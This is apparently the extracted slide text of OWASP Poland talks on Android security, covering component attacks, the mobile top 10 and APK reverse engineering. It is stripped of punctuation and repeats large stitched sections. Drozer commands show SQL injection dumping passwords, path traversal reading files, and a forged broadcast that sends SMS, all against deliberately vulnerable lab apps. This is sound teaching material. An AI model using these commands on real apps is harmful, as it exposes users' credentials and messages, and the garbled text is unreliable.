dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
